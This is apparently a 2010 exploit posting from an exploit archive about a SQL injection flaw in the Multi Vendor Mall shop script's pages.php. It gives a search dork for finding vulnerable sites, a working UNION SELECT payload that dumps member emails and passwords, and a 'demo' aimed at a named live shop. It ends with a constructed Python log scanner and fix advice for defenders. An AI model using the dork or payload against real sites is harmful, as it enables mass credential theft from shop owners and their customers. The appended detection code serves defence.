Multi Vendor Mall SQL Injection Vulnerability
Posted on 26 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Multi Vendor Mall SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
=============================================
Multi Vendor Mall SQL Injection Vulnerability
=============================================

#################################################################################################
[+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability
[+] By Newbie_Campuz
[+] Published: 2010-05-24 at 22.00 WIB
[+] jatimcrew.org/
##################################################################################################
# Script Homepage:
# http://www.multishopcms.com

[+]Dork: pages.php?id= "Multi Vendor Mall"

[+] SQL Injection
http://[target]/[path]/pages.php?id=[SQL]
http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--

Demo :
http://www.bestcraftsupplies.com/pages.php?id=7
http://www.bestcraftsupplies.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl--

##################################################################################################
Thanks to Allah SWT n Nabi Muhammad SAW
Special Thanks to :
My Parent, My Brother n My Sister
Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom, Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx, jamsh0ut, elfata cybermuttaqin, k3m4ngi, roentah, zhombhie, techno_x46 and YOU... !!!
All admin, momod, spamguard, staff and member Jatim Crew..
All admin, momod, spamguard, staff and member Indonesianhacker
All admin, momod, spamguard, staff and member xteamweb
All admin, momod, spamguard, staff and member h2ozones
All admin, momod, spamguard, staff and member master-forum
##################################################################################################

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-26]</pre></body></html>
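
Added example (not part of the original advisory): a log check a defender can run to find requests that hit the pages.php?id= parameter described above with a non-integer value or a UNION SELECT. The log lines, the /shop/ path, the client addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; the /shop/ path and 192.0.2.x clients are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/May/2010:10:00:01 +0700] "GET /shop/pages.php?id=7 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [26/May/2010:10:00:05 +0700] "GET /shop/pages.php?id=-9999+union+select+'
    'group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl-- HTTP/1.1" 200 9313',
    '192.0.2.66 - - [26/May/2010:10:00:09 +0700] "GET /shop/pages.php?id=7%20UNION%2F**%2FSELECT%201 HTTP/1.1" 200 4000',
    '192.0.2.11 - - [26/May/2010:10:00:12 +0700] "GET /shop/index.php?id=abc HTTP/1.1" 200 100',
    '192.0.2.12 - - [26/May/2010:10:00:15 +0700] "GET /shop/pages.php?id=7abc HTTP/1.1" 200 3000',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def classify_id(value):
    """Return 'ok', 'union-select' or 'non-integer' for a URL-decoded id value."""
    if re.fullmatch(r"\d+", value):
        return "ok"  # the only shape a page id should ever have
    flattened = SQL_COMMENT.sub(" ", value)  # treat inline SQL comments as whitespace
    if UNION_SELECT.search(flattened):
        return "union-select"
    return "non-integer"

def scan(lines, script="pages.php", param="id"):
    """Return (client, verdict, decoded value) for every suspicious request to script."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes both '+' and %xx, so encoded payloads are compared in clear text
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A log hit only shows that the request was made; the fix in the application is to cast id to an integer or bind it as a parameter in a prepared statement before it reaches the query.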